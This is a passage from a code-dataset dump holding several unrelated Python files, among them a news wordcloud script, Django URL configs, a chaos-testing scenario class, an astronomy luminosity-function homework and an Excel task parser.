main()\n","sub_path":"scripts/make_metadata_dir.py","file_name":"make_metadata_dir.py","file_ext":"py","file_size_in_byte":6248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"373225537","text":"import MySQLdb\nimport jieba\nimport matplotlib.pyplot as 
plt\nfrom wordcloud import WordCloud\nimport time\n\n#数据库连接\nconn = MySQLdb.connect(host='localhost',\n db='sjznews',\n user='root',\n passwd='password',\n charset='utf8')\ncur = conn.cursor()\ncur.execute('SELECT * FROM sjznewsdata ;')\nrows = cur.fetchall()\nconn.close()\n\n#变量声明\nwordsp_list=''\nstopwords=[]\n\n#读取停用词表\nf=open('stopwords.txt')\nfor line in open('stopwords.txt'):\n line=f.readline()\n stopwords.append(line.rstrip('\\n'))\nf.close()\n\n#生成每日词云表\nfor n in rows:\n str_list= n[-1]\n seg_list = jieba.cut(str_list, cut_all=False)\n for seg in seg_list:\n if seg not in stopwords:\n wordsp_list=wordsp_list+'/'.join(set(seg_list)-set(stopwords))\n\nmy_wordcloud = WordCloud( background_color='white',max_words=50,max_font_size=40).generate(wordsp_list)\n\n\n'''测试部分\n#显示词云图\nplt.imshow(my_wordcloud)\nplt.axis(\"off\")\nplt.show()\n'''\n\nyear = time.strftime(\"%Y\")\nmonth = time.strftime(\"%m\")\nday = time.strftime(\"%d\")\nfile='Sjzrb'+'_'+year+'_'+month+'_'+day\nmy_wordcloud.to_file(\"%s.png\"%(file))","sub_path":"Sjznews/dataanalysis/DA.py","file_name":"DA.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"148240670","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\n\nfrom __future__ import division\nimport sys\nimport argparse\nimport os\nfrom util import mkdir, image_trans\n\nthis_script_path = os.path.dirname(__file__)\nsys.path.insert(1, this_script_path + '/../src')\nimport Parser as rp\n\n\ndef read_params(args):\n parser = argparse.ArgumentParser(description='''beta heatmap | v1.0 at 2015/10/16 by liangzb ''')\n parser.add_argument('-d', '--beta_div_dir', dest='beta_dir', metavar='DIR', type=str, required=True,\n help=\"set the beta div dir, produced by beta_diversity.py\")\n parser.add_argument('-g', '--group_file', dest='group_file', metavar='FILE', type=str, required=True,\n help=\"set the group file\")\n parser.add_argument('-o', '--out_dir', dest='out_dir', metavar='DIR', type=str, required=True,\n help=\"set the output dir\")\n args = parser.parse_args()\n params = vars(args)\n return params\n\n\ndef work(r_job, name, params):\n file = os.popen('ls %s/%s*.txt' % (params['beta_dir'], name)).read().strip()\n pdf_file = '%s/%s.heatmap.pdf' % (params['out_dir'], name)\n png_file = '%s/%s.heatmap.png' % (params['out_dir'], name)\n R_file = '%s/%s.heatmap.R' % (params['out_dir'], name)\n distance_name = name.replace('_', ' ').title()\n vars = {'for_plot': file,\n 'group_file': params['group_file'],\n 'pdf_file': pdf_file,\n 'distance_name': distance_name}\n r_job.format(vars)\n r_job.write(R_file)\n r_job.run()\n image_trans(pdf_file, png_file)\n\n\nif __name__ == '__main__':\n params = read_params(sys.argv)\n mkdir(params['out_dir'])\n r_job = rp.Rparser()\n r_job.open(this_script_path + '/../src/template/04_beta_heatmap.Rtp')\n\n for name in ['weighted_unifrac', 'unweighted_unifrac']:\n work(r_job, name, params)\n","sub_path":"script/04_beta_heatmap.py","file_name":"04_beta_heatmap.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"307128878","text":"from django.conf.urls import url\nfrom . 
import views\napp_name = 'VK'\nVk = views.VK_api()\nurlpatterns = [\n url(r'^$', Vk.index,name= 'index'),\n url(r'^messages$', Vk.messages,name= 'messages'),\n url(r'^audio$', Vk.audio,name= 'audio'),\n\n\n ]","sub_path":"VK/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"462267732","text":"\n# Copyright 2017 Bloomberg Finance L.P.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport time\nimport re\nfrom datetime import datetime\nimport calendar\nimport random\nimport logging\nimport abc\n\nfrom powerfulseal.metriccollectors.stdout_collector import StdoutCollector\n\n\nclass Scenario():\n \"\"\" Basic class to represent a single testing scenario.\n\n Scenarios consist of 3 lists of things:\n - matches - to create the intial set of items\n - filters - to filter out the set\n - actions - to execute on all of the remaining items\n\n The scenarios are described using a yaml schema, that conforms\n to powerfulseal/policy/ps-schema.json JSON schema.\n\n This is a base class, containing some shared filters, shouldn't be\n used by itself. It's extended for both node and pod scenarios.\n \"\"\"\n\n def __init__(self, name, schema, logger=None, metric_collector=None):\n self.name = name\n self.schema = schema\n self.logger = logger or logging.getLogger(__name__ + \".\" + name)\n self.metric_collector = metric_collector or StdoutCollector()\n self.property_rewrite = {\n \"group\": \"groups\",\n }\n\n def execute(self):\n \"\"\" Main entry point to starting a scenario.\n\n It calls .match() to compute the intial set of items,\n then goes through all the filters in sequence,\n and finally executes all the actions on all remaining items.\n \"\"\"\n initial_set = self.match()\n self.logger.debug(\"Initial set: %r\", initial_set)\n self.logger.info(\"Initial set length: %d\", len(initial_set))\n filtered_set = self.filter(initial_set)\n self.logger.debug(\"Filtered set: %r\", filtered_set)\n self.logger.info(\"Filtered set length: %d\", len(filtered_set))\n self.act(filtered_set)\n self.logger.info(\"Done\")\n\n @abc.abstractmethod\n def match(self):\n \"\"\" Reads the policy and returns the initial set of items.\n \"\"\"\n pass # pragma: no cover\n\n def match_property(self, candidate, criterion):\n \"\"\" Helper method to match a property following some criterion.\n Turns the value into a regular expression.\n \"\"\"\n if not criterion:\n return False\n attr = criterion.get(\"name\")\n attr = self.property_rewrite.get(attr, attr)\n value = getattr(candidate, attr)\n expr = re.compile(criterion.get(\"value\"))\n if type(value) is list:\n return any([\n expr.match(str(v))\n for v in value\n ])\n else:\n value = str(value)\n return expr.match(value)\n\n def filter(self, items):\n \"\"\" Applies various filters based on the given policy.\n \"\"\"\n filters = self.schema.get(\"filters\", [])\n mapping = {\n \"property\": self.filter_property,\n \"dayTime\": 
self.filter_day_time,\n \"randomSample\": self.filter_random_sample,\n \"probability\": self.filter_probability,\n }\n return self.filter_mapping(items, filters, mapping)\n\n def filter_property(self, candidates, criterion):\n \"\"\" Filters out things which don't match their property filters.\n \"\"\"\n return [\n candidate for candidate in candidates\n if self.match_property(candidate, criterion)\n ]\n\n def filter_day_time(self, candidates, criterion, now=None):\n \"\"\" Passed unchanged list of candidates, if the execution time\n satisfies the policy requirements.\n \"\"\"\n now = now or datetime.now()\n self.logger.info(\"Now is %r\", now)\n\n # check the day is permitted\n day_name = calendar.day_name[now.weekday()].lower()\n permitted_days = criterion.get(\"onlyDays\", [])\n if permitted_days and day_name not in permitted_days:\n self.logger.info(\"Not allowed on %s\", day_name)\n return []\n\n # check the time is not too early\n start = criterion.get(\"startTime\", {})\n start_date = now.replace(\n hour=start.get(\"hour\", 10),\n minute=start.get(\"minute\", 0),\n second=start.get(\"second\", 0),\n )\n if now < start_date:\n self.logger.info(\"Too early\")\n return []\n\n # check the time is not too late\n end = criterion.get(\"endTime\", {})\n end_date = now.replace(\n hour=end.get(\"hour\", 15),\n minute=end.get(\"minute\", 59),\n second=end.get(\"second\", 59),\n )\n if now > end_date:\n self.logger.info(\"Too late\")\n return []\n\n return candidates\n\n def filter_random_sample(self, candidates, criterion):\n \"\"\" Returns a random sample from the initial list.\n It supports policy `size` and `ratio` features.\n \"\"\"\n if not criterion:\n return []\n size = criterion.get(\"size\")\n if size is None:\n ratio = criterion.get(\"ratio\", 1)\n size = int(len(candidates)*ratio)\n if size == 0:\n self.logger.info(\"RandomSample size 0\")\n return []\n return random.sample(candidates, size)\n\n def filter_probability(self, candidates, criterion):\n \"\"\" Returns the initial set unchanged with given probability.\n Returns empty list otherwise.\n \"\"\"\n proba = float(criterion.get(\"probabilityPassAll\", 0.5))\n if random.random() > proba:\n self.metric_collector.add_probability_filter_passed_no_nodes_filter()\n return []\n return candidates\n\n def filter_mapping(self, items, filters, mapping):\n \"\"\" Executes filters mapped to methods, based on policy keywords.\n \"\"\"\n for criterion in filters:\n filter_method = None\n filter_params = None\n for filter_type in mapping.keys():\n if filter_type in criterion:\n filter_method = mapping.get(filter_type)\n filter_params = criterion.get(filter_type)\n len_before = len(items)\n items = filter_method(items, filter_params)\n len_after = len(items)\n self.logger.info(\"Filter %s: %d -> %d items\", filter_type, len_before, len_after)\n break\n if not items:\n self.logger.info(\"Empty set after %r\", criterion)\n break\n\n if not items:\n self.metric_collector.add_filtered_to_empty_set_metric()\n\n return items\n\n @abc.abstractmethod\n def act(self, items):\n \"\"\" Execute policy's actions on the items,\n \"\"\"\n pass # pragma: no cover\n\n def action_wait(self, item, params):\n \"\"\" Waits x seconds, according to the policy.\n \"\"\"\n sleep_time = params.get(\"seconds\", 0)\n self.logger.info(\"Action sleep for %s seconds\", sleep_time)\n time.sleep(sleep_time)\n\n def act_mapping(self, items, actions, mapping):\n \"\"\" Executes all the actions on the list of pods.\n \"\"\"\n for action in actions:\n for key, method in 
mapping.items():\n if key in action:\n params = action.get(key)\n for item in items:\n method(item, params)\n # special case - if we're waiting, only do that on first item\n if key == \"wait\":\n break\n\n\n","sub_path":"powerfulseal/policy/scenario.py","file_name":"scenario.py","file_ext":"py","file_size_in_byte":8041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"581136680","text":"from . import views\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nurlpatterns = [\n path('', views.index),\n\n path('test', views.test, name='test'),\n path('signup', views.signup_view, name='signup'),\n path('login', views.login_view, name='login'),\n path('logout', views.logout_view, name='logout'),\n path('booster', views.booster, name='booster'),\n path('downloadpage/', views.downloadpage, name='downloadpage'), # url contains object id ( oid ) which is use to\n path('downloadpage/download/', views.download, name='download'),\n path('upload_form', views.upload_form, name='upload_form'), # display the content on download page.\n path('profile_form', views.profile_form, name='profile_form'),\n path('profile_page', views.profile_page, name='profile_page'),\n path('profile_page/user_settings', views.user_settings, name='user_settings'),\n path('', views.next_index),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","sub_path":"Userdb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"516518623","text":"from spacy.lang.en import English\n\nnlp = English()\n\n# Обработка текста\ndoc = nlp(\n \"In 1990, more than 60% of people in East Asia were in extreme poverty. 
\"\n \"Now less than 4% are.\"\n)\n\n# Перебор токенов документа doc\nfor token in doc:\n # Проверка на соответствие токена числу\n if ____.____:\n # Получение следующего токена документа\n next_token = ____[____]\n # Проверка на равенство текстового значения следующего токена знаку \"%\"\n if next_token.____ == \"%\":\n print(\"Найдено значение процента:\", token.text)\n","sub_path":"exercises/ru/exc_01_04.py","file_name":"exc_01_04.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"36434043","text":"from datetime import datetime\n\nfrom django.core.exceptions import ValidationError\n\n\ndef validate_year(year):\n current_year = datetime.now().year\n if year > current_year:\n raise ValidationError(\n f'Год произведения не может быть больше, чем {current_year}!'\n )\n","sub_path":"api_yamdb/api/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"618976941","text":"# coding: utf-8\nfrom django.conf.urls import *\nimport views\nimport feeds\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n url(r'^facet_explore/$', views.facet_explore, name='facet_explore'),\n url(r'^income/$', views.participant_income, name='participant_income'),\n url(r'^rss/$', feeds.LatestEntriesFeed(), name='rss'),\n url(r'^ecatalog/$', views.index, name='ecatalog', kwargs={'catalog':'sc2'}),\n url(r'^ecollection/$', views.index, name='ecollection', kwargs={'catalog':'ebooks'}),\n url(r'^detail/(?P[A-Za-z]+)/$', views.detail, name='detail'),\n url(r'^select/library/$', views.select_library, name='select_library'),\n url(r'^statictics/$', views.statictics, name='statictics'),\n url(r'^requests/$', views.saved_search_requests, name='saved_search_requests'),\n url(r'^requests/save/$', views.save_search_request, name='save_search_request'),\n url(r'^requests/delete/(?P\\d+)/$', views.delete_search_request, name='delete_search_request'),\n url(r'^print/(?P[A-Za-z]+)/$', views.to_print, name='to_print'),\n url(r'^print_to_pdf/$', views.print_to_pdf, name='print_to_pdf'),\n # url(r'^collections/$', views.get_collections, name='collections'),\n)\n","sub_path":"libcms/apps/ssearch/frontend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"609301539","text":"#!/usr/bin/python\n\ndef problem_1b(show=True):\n import matplotlib.pyplot as plt\n import numpy as np\n\n phi_star = 1.64e-2 # h^3 Mpc^-2\n h = 0.7\n m_star = -19.67 + 5*np.log10(h)\n alpha = -1.21\n m_array = np.arange(-24 + 5*np.log10(h), -10 + 5*np.log10(h),0.01)\n #print m_array\n\n prob_dens = schechter(m_array, alpha, m_star, phi_star)\n\n # Create figure\n fig = plt.figure(figsize=(8,8))\n ax = fig.add_subplot(111)\n\n ax.plot((m_array - 5*np.log10(h)).T, (np.log10(prob_dens)).T )\n\n ax.set_ylim([-6,-1])\n ax.set_xlim([-13.1,-22.9])\n\n # Adjust asthetics\n ax.set_xlabel(r'M$_{\\rm bj}$ - 5log(h)',\n size = 'small',\n family='serif')\n ax.set_ylabel(r'log($\\phi$ / [h$^3$Mpc$^{-3}$mag$^{-1}$])',\n size = 'small',\n family='serif')\n ax.set_title('1b: Luminosity function of galaxies shown in 2.25')\n ax.grid(True)\n\n if True:\n plt.savefig('hw1.1b.png',bbox_inches='tight',dpi=500)\n if show:\n fig.show()\n\ndef schechter(m_array, alpha, m_star, phi_star):\n import numpy as np\n\n prob_dens = 
np.log(10) / 2.5 * phi_star * \\\n (10**(-0.4*(m_array - m_star)))**(alpha+1) *\\\n np.exp(-10**(-0.4*(m_array - m_star)))\n\n return prob_dens\n\ndef problem_1c(show=True, N=10**3):\n import matplotlib.pyplot as plt\n import numpy as np\n\n # define schechter function parameters\n phi_star = 1.64e-2 # h^3 Mpc^-2\n h = 0.7\n m_star = -19.67 + 5*np.log10(h)\n alpha = -1.21\n M_binsize = 0.1\n m_array = np.arange(-22.5 + 5*np.log10(h), -13.1 + 5*np.log10(h),\n M_binsize)\n\n # create distribution of M\n prob_dens = schechter(m_array, alpha, m_star, phi_star)\n\n # integrate\n prob = (prob_dens * M_binsize).sum()\n volume = N / prob * M_binsize\n\n # get number of galaxies with Magnitude M\n N_galaxies_dM = prob_dens * volume\n\n # galaxies = N_galaxies / (volume * (m_array[1] - m_array[0]))\n\n distances = np.random.random(N) * .98e9 + .020e6 # Mpc\n\n # Move each individual galaxy to given distance,\n # calculate apparent magnitude\n count = 0\n apparent_mags = np.zeros(distances.shape)\n for i in range(len(m_array)):\n for j in range(int(N_galaxies_dM[i])):\n apparent_mags[count + j] = m_array[i] + \\\n 5*np.log10(distances[count + j]/10.)\n count += N_galaxies_dM[i]\n\n plot_problem_1c(apparent_mags, show=show)\n\ndef plot_problem_1c(apparent_mags, show=True):\n import matplotlib.pyplot as plt\n import numpy as np\n\n # Create figure\n fig = plt.figure(figsize=(8,8))\n ax = fig.add_subplot(111)\n\n ax.hist(apparent_mags,bins=100, histtype='step', color='k')\n\n #ax.set_ylim([-6,-1])\n ax.set_xlim([27,10])\n\n # Adjust asthetics\n ax.set_xlabel(r'm$_{bj}$ [magnitudes]',\n size = 'small',\n family='serif')\n ax.set_ylabel(r'N',\n size = 'small',\n family='serif')\n ax.set_title('1c: Number density of galaxy apparent magnitudes.')\n ax.grid(True)\n\n if True:\n plt.savefig('hw1.1c.png',bbox_inches='tight')\n if show:\n fig.show()\n\ndef problem_1d(show=True, N=10**5):\n import matplotlib.pyplot as plt\n import numpy as np\n\n # define schechter function parameters\n phi_star = 1.64e-2 # h^3 Mpc^-2\n h = 0.7\n m_star = -19.67 + 5*np.log10(h)\n alpha = -1.21\n M_binsize = 0.1\n m_array = np.arange(-22.5 + 5*np.log10(h), -13.1 + 5*np.log10(h),\n M_binsize)\n\n # create distribution of M\n prob_dens = schechter(m_array, alpha, m_star, phi_star)\n\n # integrate\n prob = (prob_dens * M_binsize).sum()\n volume = N / prob * M_binsize\n\n # get number of galaxies with Magnitude M\n N_galaxies_dM = prob_dens * volume\n # galaxies = N_galaxies / (volume * (m_array[1] - m_array[0]))\n\n distances = np.random.random(N) * .98e9 + .020e6 # Mpc\n\n # Move each individual galaxy to given distance,\n # calculate apparent magnitude\n #apparent_mags = np.zeros(N)\n #for i, distance in enumerate(distances):\n # for j in range(len(N_galaxies_dM)):\n # apparent_mags[i] = m_array[j] + 5*np.log10(distance/10.)\n\n # Move each individual galaxy to given distance,\n # calculate apparent magnitude\n count = 0\n apparent_mags = np.zeros(distances.shape)\n for i in range(len(m_array)):\n for j in range(int(N_galaxies_dM[i])):\n apparent_mags[count + j] = m_array[i] + \\\n 5*np.log10(distances[count + j]/10.)\n count += N_galaxies_dM[i]\n\n count = 0\n N_galaxies_cut = np.zeros(m_array.shape)\n for i in range(len(m_array)):\n for j in range(int(N_galaxies_dM[i])):\n if apparent_mags[count + j] < 20:\n N_galaxies_cut[i] += 1\n count += N_galaxies_dM[i]\n\n plot_problem_1d(m_array=m_array, N_galaxies_dM=N_galaxies_dM,\n N_galaxies_cut=N_galaxies_cut, apparent_mags=apparent_mags, show=show)\n\ndef 
plot_problem_1d(m_array=None, N_galaxies_dM=None,\n N_galaxies_cut=None, apparent_mags=None, show=True):\n import matplotlib.pyplot as plt\n import numpy as np\n\n # Create figure\n fig = plt.figure(figsize=(8,8))\n ax = fig.add_subplot(111)\n\n ax.plot(m_array,N_galaxies_dM,\n color='g', label='Untrimmed',\n drawstyle='steps')\n\n ax.plot(m_array,N_galaxies_cut,\n color='r', label='Magnitude-limited',\n drawstyle='steps-pre')\n\n ax.set_xlim([-13.1,-22.9])\n ax.set_ylim([1,10**4])\n ax.set_yscale('log')\n\n # Adjust asthetics\n ax.set_xlabel(r'M [magnitude]',\n size = 'small',\n family='serif')\n ax.set_ylabel(r'N',\n size = 'small',\n family='serif')\n ax.set_title('1d: Histogram of Absolute Magnitudes')\n ax.grid(True)\n ax.legend(loc='lower left')\n\n if True:\n plt.savefig('hw1.1d.png',bbox_inches='tight',dpi=500)\n if show:\n fig.show()\n\ndef problems_1fgh(show=True, N=10**5, distance_bin=1):\n\n '''\n Parameters\n ----------\n distance_bin : float\n In units of Mpc\n\n '''\n\n import matplotlib.pyplot as plt\n import numpy as np\n\n # define schechter function parameters\n phi_star = 1.64e-2 # h^3 Mpc^-2\n h = 0.7\n m_star = -19.67 + 5*np.log10(h)\n alpha = -1.21\n M_binsize = 0.1\n m_array = np.arange(-22.5 + 5*np.log10(h), -13.1 + 5*np.log10(h),\n M_binsize)\n\n # create distribution of M\n prob_dens = schechter(m_array, alpha, m_star, phi_star)\n\n # integrate\n prob = (prob_dens * (m_array[1] - m_array[0])).sum()\n volume = N / prob * M_binsize\n\n # get number of galaxies with Magnitude M\n N_galaxies_dM_untrimmed = prob_dens * volume\n\n # Calulate random distances between 20 and 1000 Mpc\n distances = np.random.random(N) * .98e9 + .020e9 # pc\n indices = distances.argsort()\n\n # There must be at least 1 galaxy in the last slice\n N_1000 = 0\n while N_1000 == 0:\n # find number of galaxies at farthest distance\n N_1000 = distances[distances > 1e9 - distance_bin * 1e6].size\n distance_bin += 0.1\n\n # find volume of farthest distance\n volume_1000 = N_1000 / prob * M_binsize\n\n N_volume_bins = int((1000 - 20) / distance_bin)\n\n N_galaxies_dM_array = np.zeros(shape=(prob_dens.shape[0], N_volume_bins))\n\n volume_farther = volume_1000\n distance_farther = 1000 - distance_bin\n N_galaxies_dM_array[:,0] = N_1000\n\n # Define the number of galaxies in each volume bin\n for i in range(1,N_volume_bins):\n distance_closer = distance_farther - distance_bin\n volume_closer = volume_farther * \\\n distance_closer**2 / distance_farther**2\n\n # get number of galaxies between Magnitude M and M+dM\n N_galaxies_dM_array[:,i] = prob_dens * volume_closer\n\n # perform again on next volume slice\n volume_farther = volume_closer\n distance_farther = distance_closer\n\n # Calculate total numbe rof galaxies\n N_galaxies = N_galaxies_dM_array.sum()\n\n print('Total number of galaxies in volume-limited sample = ' + \\\n str(int(N_galaxies)))\n\n # Calculate the number of galaxies between absolute mag M and M + dM\n N_galaxies_dM = N_galaxies_dM_array.sum(axis=1)\n\n # Calulate random distances between 20 and 1000 Mpc now for the number of\n # galaxies in the volume limited sample\n distances = np.random.random(N_galaxies) \\\n * .98e9 + .020e9 # pc\n\n # calculate apparent magnitude\n count = 0\n apparent_mags = np.zeros(distances.shape)\n for i in range(len(m_array)):\n for j in range(int(N_galaxies_dM[i])):\n apparent_mags[count + j] = m_array[i] + \\\n 5*np.log10(distances[count + j]/10.)\n count += N_galaxies_dM[i]\n\n # Find galaxies with m < 20\n count = 0\n N_galaxies_cut = 
np.zeros(m_array.shape)\n distances_cut = []\n m_array_distances = []\n for i in range(len(m_array)):\n for j in range(int(N_galaxies_dM[i])):\n if apparent_mags[count + j] < 20:\n N_galaxies_cut[i] += 1\n distances_cut.append(distances[count + j])\n m_array_distances.append(m_array[i])\n count += N_galaxies_dM[i]\n\n # problem 1f\n ############\n plot_problem_1f(m_array=m_array, N_galaxies_cut=N_galaxies_cut,\n N_galaxies_dM=N_galaxies_dM,\n N_galaxies_dM_untrimmed=N_galaxies_dM_untrimmed, show=show)\n\n\n # problem 1g\n ############\n apparent_mags_binsize = 50\n apparent_mags_cut = apparent_mags[apparent_mags < 20]\n bins = len(apparent_mags_cut) / apparent_mags_binsize\n\n N_apparent_mags, apparent_mags_bin = \\\n np.histogram(apparent_mags_cut, bins=bins)\n\n # calculate fraction near limiting magnitude\n limiting_indices = np.where(apparent_mags_bin[:-1] > 19.5)[0]\n sample_total_N = N_apparent_mags.sum()\n limiting_fraction = N_apparent_mags[limiting_indices[-1]] / \\\n float(sample_total_N)\n print('Fraction of sample within 0.5 magnitudes of the limiting' + \\\n ' magnitude = %.2f' % limiting_fraction)\n\n plot_problem_1g(apparent_mags_bin=apparent_mags_bin,\n N_apparent_mags=N_apparent_mags, show=show)\n\n\n # problem 1h\n ############\n plot_problem_1h(m_array_distances=np.asarray(m_array_distances),\n distances_cut=np.asarray(distances_cut), show=show)\n\ndef plot_problem_1f(m_array=None, N_galaxies_cut=None, N_galaxies_dM=None,\n N_galaxies_dM_untrimmed=None, show=True):\n\n import matplotlib.pyplot as plt\n import numpy as np\n # Create figure\n fig = plt.figure(figsize=(8,8))\n ax = fig.add_subplot(111)\n\n ax.plot(m_array,N_galaxies_dM_untrimmed,\n color='b', label='Untrimmed', linestyle='-',\n drawstyle='steps')\n ax.plot(m_array,N_galaxies_dM,\n color='r', label='Volume-limited', linestyle='-',\n drawstyle='steps')\n ax.plot(m_array,N_galaxies_cut,\n color='g', label='Magnitude- and Volume-limited', linestyle='-',\n drawstyle='steps')\n\n ax.set_xlim([-13.1,-22.9])\n ax.set_ylim([1,10**4])\n ax.set_yscale('log')\n\n # Adjust asthetics\n ax.set_xlabel(r'M [magnitude]',\n size = 'small',\n family='serif')\n ax.set_ylabel(r'N',\n size = 'small',\n family='serif')\n ax.set_title(r'1f: Luminosity function of magnitude limited sample')\n ax.grid(True)\n ax.legend(loc='lower left')\n\n if True:\n plt.savefig('hw1.1f.png',bbox_inches='tight',dpi=500)\n if show:\n fig.show()\n\ndef plot_problem_1g(apparent_mags_bin=None, N_apparent_mags=None, show=True):\n import matplotlib.pyplot as plt\n import numpy as np\n\n # Create figure\n fig = plt.figure(figsize=(8,8))\n ax = fig.add_subplot(111)\n\n ax.plot(apparent_mags_bin[:-1], N_apparent_mags,\n color='g', label='Untrimmed', linestyle='-',\n drawstyle='steps-post')\n\n ax.set_xlim([17,20.5])\n #ax.set_yscale('log')\n\n # Adjust asthetics\n ax.set_xlabel(r'm$_{bj}$',\n size = 'small',\n family='serif')\n ax.set_ylabel(r'N',\n size = 'small',\n family='serif')\n ax.set_title(r'1g: Number of galaxies in volume-limited sample')\n ax.grid(True)\n\n if True:\n plt.savefig('hw1.1g.png',bbox_inches='tight',dpi=500)\n if show:\n fig.show()\n\ndef plot_problem_1h(m_array_distances=None, distances_cut=None, show=True):\n import matplotlib.pyplot as plt\n import numpy as np\n # Create figure\n fig = plt.figure(figsize=(8,8))\n ax = fig.add_subplot(111)\n\n ax.scatter(m_array_distances, distances_cut/1e6,\n color='k', label='Untrimmed', alpha=0.1)\n\n #ax.set_xlim([-13.1,-22.9])\n #ax.set_yscale('log')\n\n # Adjust asthetics\n ax.set_xlabel(r'M 
[magnitudes]',\n                  size = 'small',\n                  family='serif')\n    ax.set_ylabel(r'Distance [Mpc]',\n                  size = 'small',\n                  family='serif')\n    ax.set_title(r'1h: Distance vs. M in volume-limited sample')\n    ax.grid(True)\n\n    if True:\n        plt.savefig('hw1.1h.png',bbox_inches='tight',dpi=500)\n    if show:\n        fig.show()\n\ndef main():\n    import numpy as np\n\n    N = 10**5\n    show = False\n\n    #problem_1b(show=show)\n\n    problem_1c(N=N, show=show)\n\n    problem_1d(N=N, show=show)\n\n    problems_1fgh(N=N, show=show)\n\nif __name__ == '__main__':\n    main()\n","sub_path":"classes/galaxies/hw1/hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":13482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
+{"seq_id":"431451330","text":"import xlrd,openpyxl,sys,os,time\nfrom openpyxl.styles import PatternFill, Border, Side, Alignment, Protection, Font\nfrom openpyxl.styles.colors import BLACK\n\nstrDes='''\n====================================================================\n\t\t1.智能脚本填充工具 - Smart BOOKMARK UPgrade\n\t\t2.版本信息创建 - Valuation System Version Create\n\t\t Python By 3.7.1 by Spake\n====================================================================\n\t'''\n\n\nstrLocalFolder = ''#本地目录\nexcel_path = ''#源文件目录\nbook_path = ''#生成目标文件目录\nTask_Number = 0\nCustomer = 0\nCustomID = 0\nType = 0\nVersionID = ''#版本号\n\ndef _init():\n\n    global strLocalFolder\n    global excel_path\n    global book_path\n    # 获取目录\n    strLocalFolder = os.getcwd()#D:\\git\\excel_mate\\file\\估值_FD20170307-D28升级说明-相泽峰 .xlsx\n    book_path = strLocalFolder + r'\\估值_FD20170307-D28升级说明-相泽峰 .xlsx'\n    for root, dirs, files in os.walk(strLocalFolder):\n        for file in files:\n            if file.find('TaskDetail')>=0:\n                excel_path = strLocalFolder +r'/'+file\n\n\n\n\nclass _Tasks:\n    def __init__(self):\n        self.Task = {'任务编号':'' , '需求提出方':'' , '需求编号':'' , '类型':''}\n        self.Tasks = []\n\n    def Append_Rwbh(self,data):\n        self.Task['任务编号'] = data[0]\n        self.Task['需求提出方'] = data[1]\n        self.Task['需求编号'] = data[2]\n        self.Task['类型'] = data[3]\n        self.Tasks.append(dict(self.Task))\n\n\n# https://www.cnblogs.com/linyfeng/p/7123423.html\n# 打开excel文件并获取所有sheet xlrd.open_workbook\n# 根据下标获取sheet名称 sheet2_name=workbook.sheet_names()[1]\n# 获取sheet名称、行数、列数 workbook.sheet_by_index(1) sheet2.name, sheet2.nrows, sheet2.ncols\n# 根据sheet名称获取整行和整列的值 sheet2.row_values(3) sheet2.col_values(2)\n# 获取指定单元格的内容 sheet2.cell(1,0).value.encode('utf-8') sheet2.cell_value(1,0).encode('utf-8') print sheet2.row(1)[0].value.encode('utf-8')\n# 获取单元格内容的数据类型 sheet2.cell(1,0).ctype\n\n# 1、先读取第一行 查找以下字符串 并记录所在列数:\n# Task_Number任务编号 Customer 需求提出方 CustomID 对应的需求点编号 Type类型\n# 2、根据数字 提取每一行的关键信息 添加到Tasks类里\n# 3、数据下发(待开发)\n\n\ndef read_excel():\n    global excel_path\n    global Task_Number\n    global Customer\n    global CustomID\n    global Type\n    wb = xlrd.open_workbook(excel_path)\n    sheet_name = wb.sheet_names()[0]\n    sheet = wb.sheet_by_name(sheet_name)\n    rows = sheet.row_values(0)\n    i = 0\n    for row in rows:\n        if row.find('任务编号')>=0:\n            Task_Number = i\n        if row.find('需求提出方')>=0:\n            Customer = i\n        if row.find('对应的需求点编号')>=0:\n            CustomID = i\n        if row.find('类型')>=0:\n            Type = i\n        i += 1\n    Task_datas = _Tasks()\n    Bug_dates = _Tasks()\n    Task_info = []\n    for j in range(1,sheet.nrows):\n        Task_info.append(sheet.row_values(j)[Task_Number])\n        Task_info.append(sheet.row_values(j)[Customer])\n        Task_info.append(sheet.row_values(j)[CustomID])\n        Task_info.append(sheet.row_values(j)[Type])\n        if sheet.row_values(j)[Type].find('缺陷')>= 0:\n            Bug_dates.Append_Rwbh(Task_info)\n        else:\n            Task_datas.Append_Rwbh(Task_info)\n        
